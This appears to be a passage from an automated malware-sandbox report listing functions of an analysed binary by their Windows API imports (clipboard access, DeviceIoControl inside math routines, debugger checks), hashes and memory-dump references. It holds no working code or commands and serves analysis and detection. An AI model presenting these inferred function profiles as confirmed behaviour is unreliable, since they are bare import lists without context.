API ID: free$mallocmemcpysqrtf
String ID:
API String ID: 943526449-0
Opcode ID: a3de923a97fbd1606c8032885b243b605395b050d7edb045275b896e87af2970
Instruction ID: 5653d1dd3ed3eded7e8238cdc60169ab7b3257381b74629e5825a1480a22624b
Opcode Fuzzy Hash: a3de923a97fbd1606c8032885b243b605395b050d7edb045275b896e87af2970
Instruction Fuzzy Hash: 4872AC13E28BE845D3139B36944267BA7D1FF6E784F29D722ED44A6662DB3CE841C700

Function 00007FF786612F10 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF786612FB8
asin.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661306E
atan2.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866130A1

Part of subcall function 00007FF786611B70: DeviceIoControl.KERNEL32 ref: 00007FF786611BE1

sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866131BB
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866131C7
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866131D5
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866131E6
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866131F3
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF786613200
tanf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866132B6

Part of subcall function 00007FF78662A090: DeviceIoControl.KERNEL32 ref: 00007FF78662A149

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: cosfsinf$ControlDevice$asinatan2memsettanf
String ID:
API String ID: 1330759842-0
Opcode ID: b96774085f17c9f433595d22a2847f99d84dae85dffc066ee90e6205e3e24cba
Instruction ID: f846b8ebfdd2b9570c26acca94d6770b620f3df10943963b299bf46b0b3c9212
Opcode Fuzzy Hash: b96774085f17c9f433595d22a2847f99d84dae85dffc066ee90e6205e3e24cba
Instruction Fuzzy Hash: 66D1F922E28FC555E213AB3564422B6E365BF6F3D5F649332E94D31666DF28A4C2CB00

Function 00007FF7865F2A90 Relevance: 15.1, APIs: 10, Instructions: 149clipboardCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F2B14
OpenClipboard.USER32 ref: 00007FF7865F2B23

Part of subcall function 00007FF78662CA38: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF7865F2AC0), ref: 00007FF78662CA48

GetClipboardData.USER32 ref: 00007FF7865F2B3F
CloseClipboard.USER32 ref: 00007FF7865F2B4D

Part of subcall function 00007FF78662C9CC: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF7865F2AEF), ref: 00007FF78662C9DC
Part of subcall function 00007FF78662C9CC: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00007FF7865F2AEF), ref: 00007FF78662CA1C

GlobalLock.KERNEL32 ref: 00007FF7865F2B68
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F2C35
memcpy.VCRUNTIME140 ref: 00007FF7865F2C54
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F2C77
GlobalUnlock.KERNEL32 ref: 00007FF7865F2CB6
CloseClipboard.USER32 ref: 00007FF7865F2CBC

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemcpy
String ID:
API String ID: 2057792927-0
Opcode ID: 10ed9af3092add089846d6851fff59fe470364b03e1229adb50fa694fabddf7c
Instruction ID: 2dff768c96cff354af01f178ee42af678408c6ce4e168977b282f9c725f563e1
Opcode Fuzzy Hash: 10ed9af3092add089846d6851fff59fe470364b03e1229adb50fa694fabddf7c
Instruction Fuzzy Hash: BF5170B0B0DA82A2FB54AB55FD51277A2A2FF44B81FE44535C90E47390DE2CED81CB60

Function 00007FF78660A160 Relevance: 14.2, APIs: 5, Strings: 1, Instructions: 3667stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF78660A7AD
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF78660C0F9
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF78660C21D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF78660C36B
fmodf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660D5CB

Strings

#SCROLLY, xrefs: 00007FF78660A64C, 00007FF78660CCC4

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: fmodffreemallocmemcpystrncpy
String ID: #SCROLLY
API String ID: 511038203-1064663049
Opcode ID: 54465a66662625a5de271ac05680b4630052d94b7f472e3466b3ef743cc71aab
Instruction ID: 30212018f05564905768b92d58d7a0fc89d96f728098dfdbed6ad23d5ccd3dc3
Opcode Fuzzy Hash: 54465a66662625a5de271ac05680b4630052d94b7f472e3466b3ef743cc71aab
Instruction Fuzzy Hash: E173E732F086C6A6E711BA3688412BAA792FF59384F698735DE0977191DF39EC40CF11

Function 00007FF786619B40 Relevance: 14.0, APIs: 9, Instructions: 476COMMON

Download Yara Rule

APIs

__stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786619BDC
MultiByteToWideChar.KERNEL32 ref: 00007FF786619BFE
memset.VCRUNTIME140 ref: 00007FF786619C2C
MultiByteToWideChar.KERNEL32 ref: 00007FF786619C45

Part of subcall function 00007FF7866296D0: memcpy.VCRUNTIME140(00000000,?,?,00007FF786612701), ref: 00007FF78662973A

WideCharToMultiByte.KERNEL32 ref: 00007FF786619C92
memset.VCRUNTIME140 ref: 00007FF786619CB3
WideCharToMultiByte.KERNEL32 ref: 00007FF786619CDA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619D48

Part of subcall function 00007FF786601A40: memchr.VCRUNTIME140 ref: 00007FF786601B96
Part of subcall function 00007FF786601A40: memchr.VCRUNTIME140 ref: 00007FF786601BF8

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661A2F6

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemcpy
String ID:
API String ID: 3704722475-0
Opcode ID: c35b0267b641eca2e4c6c7ee181259d97e7b1fdd9ee1529e74b068ad53242d7e
Instruction ID: 05e721547503c9ff868272a862f5d74db52430e9bdc0e1e9b414f445e99c6127
Opcode Fuzzy Hash: c35b0267b641eca2e4c6c7ee181259d97e7b1fdd9ee1529e74b068ad53242d7e
Instruction Fuzzy Hash: 2422F132F18BC495E711DB75D8402AAB761FB98798F544332EE8D27A59DF38E984CB00

Function 00007FF78662D588 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF78662D5A4
memset.VCRUNTIME140 ref: 00007FF78662D5C8
RtlCaptureContext.NTDLL ref: 00007FF78662D5D1
RtlLookupFunctionEntry.NTDLL ref: 00007FF78662D5EB
RtlVirtualUnwind.NTDLL ref: 00007FF78662D62C
memset.VCRUNTIME140 ref: 00007FF78662D65F
IsDebuggerPresent.KERNEL32 ref: 00007FF78662D680
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF78662D69D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF78662D6A8

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: f1add5d3ab2aee3b93a245a28b42dfe8f7f18b86da77bbe61d620c10ed4ab906
Instruction ID: f39dd50f20f275c2d832fed6d4df14dc7554b0cb69e9d342ed2ba1b733631f5e
Opcode Fuzzy Hash: f1add5d3ab2aee3b93a245a28b42dfe8f7f18b86da77bbe61d620c10ed4ab906
Instruction Fuzzy Hash: 34312172705BC196EB609FA1E8403EEB366FB84748F54403ADA4D57B94DF78D948CB10

Function 00007FF7865F97A0 Relevance: 12.3, APIs: 8, Instructions: 254COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F9892
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F98C0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F98EF
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F991A
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F9B18
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F9B46
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F9B75
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F9BA0

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: acb62d44f2b0c97fdc5f4c14e489ec2560aaa7e1f6ff8055ee4b6d95eee40dca
Instruction ID: dab29259462faac06420d1ae34e29e3d45a64597362b1f735548e312ff00e12e
Opcode Fuzzy Hash: acb62d44f2b0c97fdc5f4c14e489ec2560aaa7e1f6ff8055ee4b6d95eee40dca
Instruction Fuzzy Hash: 50B19222E28FCC51E223A63754821FAE250AFBF3C4F7DDB22F984756B29B2465D19510

Function 00007FF7865F2CE0 Relevance: 12.1, APIs: 8, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF7865F2CEB
GlobalAlloc.KERNEL32 ref: 00007FF7865F2D5E
GlobalLock.KERNEL32 ref: 00007FF7865F2D6F
GlobalUnlock.KERNEL32 ref: 00007FF7865F2DC1
EmptyClipboard.USER32 ref: 00007FF7865F2DC7
SetClipboardData.USER32 ref: 00007FF7865F2DD5
GlobalFree.KERNEL32 ref: 00007FF7865F2DE3
CloseClipboard.USER32 ref: 00007FF7865F2DE9

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 453615576-0
Opcode ID: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
Instruction ID: ab9375ea5983b3dc3949043213a5dc59243e8f3395bd04d8f9f2d8a1863018ef
Opcode Fuzzy Hash: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
Instruction Fuzzy Hash: 6131E861B0864292EB10AF90FD5527BF3A1FF44B94FA84131DA4D87795DE7CE846C710

Function 00007FF7865FC550 Relevance: 9.9, APIs: 6, Instructions: 873COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FC75E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FC7F2
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FC88C
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FC918
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FC9F7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FD26E

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: 1104c4011e120cab93afc595fa221a2d93fd4c7fb9e16c450bdba6d161c1d9e2
Instruction ID: eb4a2efe3cb43e81c177ef46f9fded3989d9994893e8facb54a4c2433b39cfb9
Opcode Fuzzy Hash: 1104c4011e120cab93afc595fa221a2d93fd4c7fb9e16c450bdba6d161c1d9e2
Instruction Fuzzy Hash: EE923A33A24B889AD712CF37C4811A9B760FF6D784729DB16EA0927761DB34F5A4DB00

Function 00007FF7865FD470 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FD66E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FD6E3
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865FD7CF

Strings

(, xrefs: 00007FF7865FD9EF

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: sqrtf
String ID: (
API String ID: 321154650-3887548279
Opcode ID: e6541b364bb36a7699e93789c0e8fd92e819369f602ca6f75acf4ebdd433bf80
Instruction ID: e8add87b2082478fde69468485e31069cb254720fa689a2b2b1b1e2ea0b05c15
Opcode Fuzzy Hash: e6541b364bb36a7699e93789c0e8fd92e819369f602ca6f75acf4ebdd433bf80
Instruction Fuzzy Hash: DE129133924BC896D312DF3694422ADB361FF6E788B69D712EA0833665DF34B5A1D700

Function 00007FF7865EB875 Relevance: 8.3, APIs: 1, Strings: 4, Instructions: 778COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7865F3280: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F32B3
Part of subcall function 00007FF7865F3280: memcpy.VCRUNTIME140 ref: 00007FF7865F32CF
Part of subcall function 00007FF7865F3280: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F32EF

memchr.VCRUNTIME140 ref: 00007FF7865EC0FE

Strings

%*s%.*s, xrefs: 00007FF7865EC153
%.*s, xrefs: 00007FF7865EC12E
#CLOSE, xrefs: 00007FF7865EBCFC
#COLLAPSE, xrefs: 00007FF7865EBC95

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: freemallocmemchrmemcpy
String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
API String ID: 3682640872-4275869412
Opcode ID: 1dfc8e3fe16d2856ec6161909734e3167949ebc42c32983c84b840a048b68aba
Instruction ID: ebe4fbf6696355252be3a03804969df9e50ca99b412cdd60dff7fd9175fda7a3
Opcode Fuzzy Hash: 1dfc8e3fe16d2856ec6161909734e3167949ebc42c32983c84b840a048b68aba
Instruction Fuzzy Hash: 4792D632A04BC5ABE715DB36C9412EAB3A0FF59344F588735DB28675A1DB38F464CB10

Function 00007FF7865F8BA0 Relevance: 7.8, APIs: 6, Instructions: 280COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F8C25
memset.VCRUNTIME140 ref: 00007FF7865F8D1F
memset.VCRUNTIME140 ref: 00007FF7865F8D38

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memset$malloc
String ID:
API String ID: 1671641884-0
Opcode ID: 4e6de67f0b199593fece58cbb396463285ac8eedda3d6f725b53e0abb1701a6d
Instruction ID: d85bbdbfe5e2973b4d734712d9aeabf7982d5d5aa80c69a20e678f8e91a44994
Opcode Fuzzy Hash: 4e6de67f0b199593fece58cbb396463285ac8eedda3d6f725b53e0abb1701a6d
Instruction Fuzzy Hash: 6AD1E332A09BC596E7619F26D4416AAF3B0FF58784F688331DB4867364EF38E951CB10

Function 00007FF78660F040 Relevance: 6.5, APIs: 4, Instructions: 451COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660F1FF
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660F232
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660F5DE
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660F64E

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 576af0b28d588663c10d82af8adbdc4f60bc88079ffab9676754ae1bf05fc4ff
Instruction ID: 9bb5065a1a5629d18216c4db97ddd086223bdbfda1567ccdc7abeb97b3f72d01
Opcode Fuzzy Hash: 576af0b28d588663c10d82af8adbdc4f60bc88079ffab9676754ae1bf05fc4ff
Instruction Fuzzy Hash: 99124C22F09BC955E613B63754022B6E2527F6E7C0F68CB32ED4D362A1DF397881CA11

Function 00007FF786603A70 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF786603BF3
memchr.VCRUNTIME140 ref: 00007FF786603CC1
memchr.VCRUNTIME140 ref: 00007FF786603D9E

Strings

..., xrefs: 00007FF786603A73

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memchr
String ID: ...
API String ID: 3297308162-440645147
Opcode ID: fdaf0be1249e45e5ef8dd74c920ee991e5ae9930adbc7f2a45375590b4e4af0e
Instruction ID: acbc30d20b6c6ed4bf52db745b66573d9d5ddcc2ae02b56f05d76e3280a6b0f0
Opcode Fuzzy Hash: fdaf0be1249e45e5ef8dd74c920ee991e5ae9930adbc7f2a45375590b4e4af0e
Instruction Fuzzy Hash: 9BF11232E087CA91E252A73794013F6F351FF6D785F589732EA48761A1DF79A981CB00

Function 00007FF78660EA70 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660EBEA
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660EC0B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660EF35
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660EF9D

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: ad17c0d7de902934bc31f17f45a20e81569974ba89a57bd936ff430ac94c5371
Instruction ID: bca32d453ad634d8e7de9b178b650cc1c1fc38f7541dd6eeb9349122b596a602
Opcode Fuzzy Hash: ad17c0d7de902934bc31f17f45a20e81569974ba89a57bd936ff430ac94c5371
